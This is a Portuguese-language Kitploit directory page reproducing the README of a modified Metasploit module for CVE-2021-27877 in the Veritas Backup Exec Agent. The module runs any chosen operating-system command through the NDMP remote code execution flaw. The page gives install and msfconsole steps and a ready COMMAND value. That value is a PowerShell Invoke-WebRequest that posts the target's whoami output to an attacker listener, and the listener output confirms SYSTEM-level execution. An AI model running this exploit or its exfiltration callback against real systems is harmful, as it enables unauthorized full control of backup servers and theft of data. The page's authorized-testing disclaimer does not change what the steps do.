Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-27877-PoC — Uma versão modificada do módulo Metasploit da Rapid7 para o CVE-2021-27877 que suporta execução direta de comandos para validação confiável de vulnerabilidades. Inclui documentação explicando o fluxo de trabalho do exploit, as modificações do módulo e exemplos de uso. | Kitploit
Ferramentas/GitHubGitHub/yashswarup12/cve-2021-27877-poc
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubyashswarup12/cve-2021-27877-poc

CVE-2021-27877-PoC

Uma versão modificada do módulo Metasploit da Rapid7 para o CVE-2021-27877 que suporta execução direta de comandos para validação confiável de vulnerabilidades. Inclui documentação explicando o fluxo de trabalho do exploit, as modificações do módulo e exemplos de uso.

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-27877 Prova de Conceito

Este repositório contém uma versão modificada do módulo original do Rapid7 Metasploit para o CVE-2021-27877 que afeta o Agente do Veritas Backup Exec.

Durante meus testes, o módulo original do Metasploit identificou com sucesso o alvo como vulnerável, mas falhou consistentemente ao estabelecer uma sessão porque a etapa de entrega do payload não foi bem-sucedida. No entanto, a análise do módulo mostrou que a autenticação e a funcionalidade subjacente de execução de comandos estavam funcionando corretamente.

Para simplificar a validação da vulnerabilidade, modifiquei o módulo para executar comandos do sistema operacional fornecidos pelo usuário diretamente através da funcionalidade vulnerável de execução de comandos NDMP, em vez de carregar e executar um payload. Isso torna mais fácil confirmar a execução remota de código sem depender de um shell reverso ou de um estágio de payload.

Aviso: Esta prova de conceito é fornecida apenas para fins educacionais e testes de segurança autorizados. Use-a apenas contra sistemas que você possui ou para os quais tenha permissão explícita para avaliar.

Nota: Para proteger o ambiente usado durante os testes, todos os endereços IP neste repositório foram anonimizados. Ao longo dos exemplos, 192.168.x.x representa o host alvo, enquanto 192.168.y.y representa o sistema atacante ou o ouvinte. Essas substituições não afetam a funcionalidade da prova de conceito.


Alterações

Em comparação com o módulo original do Rapid7, as seguintes modificações foram feitas:

  • Adicionada uma nova opção de tempo de execução .
COMMAND
  • Removida a dependência de carregar um payload.
  • Executa um único comando especificado pelo usuário.
  • Não tenta estabelecer uma sessão Meterpreter.

  • Instalação

    Copie o módulo modificado para o diretório de módulos locais do Metasploit.

    root@kitploit:~
    cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/
    

    Inicie (ou reinicie) o Metasploit e recarregue os módulos locais:

    root@kitploit:~
    msfconsole
    reload_all
    

    Uso

    Antes de executar o módulo, inicie um ouvinte HTTP (ou qualquer servidor web capaz de receber e exibir requisições HTTP POST). Este ouvinte receberá a saída do comando executado no alvo.

    Por exemplo, você pode usar um servidor HTTP Python simples com um manipulador de requisições personalizado, nc, ou qualquer ouvinte HTTP de sua escolha.

    Carregue o módulo:

    root@kitploit:~
    use exploit/multi/veritas/beagent_sha_auth_rce_custom
    

    Configure as opções necessárias:

    root@kitploit:~
    set RHOSTS 192.168.x.x
    set RPORT 10000
    
    set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"
    
    run
    

    A opção COMMAND aceita qualquer comando que você deseje executar no alvo.


    Recuperando a Saída do Comando

    Este módulo foi projetado para executar um único comando e não retorna a saída do comando automaticamente.

    Para recuperar a saída, use um mecanismo de callback apropriado dentro do seu comando (por exemplo, uma requisição HTTP POST ou outro canal de saída) e monitore seu ouvinte.

    Exemplo de saída do ouvinte:

    root@kitploit:~
    Listening on 0.0.0.0 8080
    Connection received on 192.168.x.x 26006
    POST / HTTP/ 1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShe11/5.1.14393.9234
    Content-Type: application/x-www-form-urlencoded
    Host: 192.168.y.y:8080
    Content-Length: 19
    Expect: 100-continue
    Connection: Keep-Alive
    
    nt authority\system
    

    Referências

    • Módulo Rapid7 Metasploit
    • Comunicado de Segurança da Veritas (VTS21-001)
    • Artigo no Medium

    Créditos

    • Módulo original do Metasploit: Rapid7
    • Modificações: Yash Swarup
    Baixar ferramenta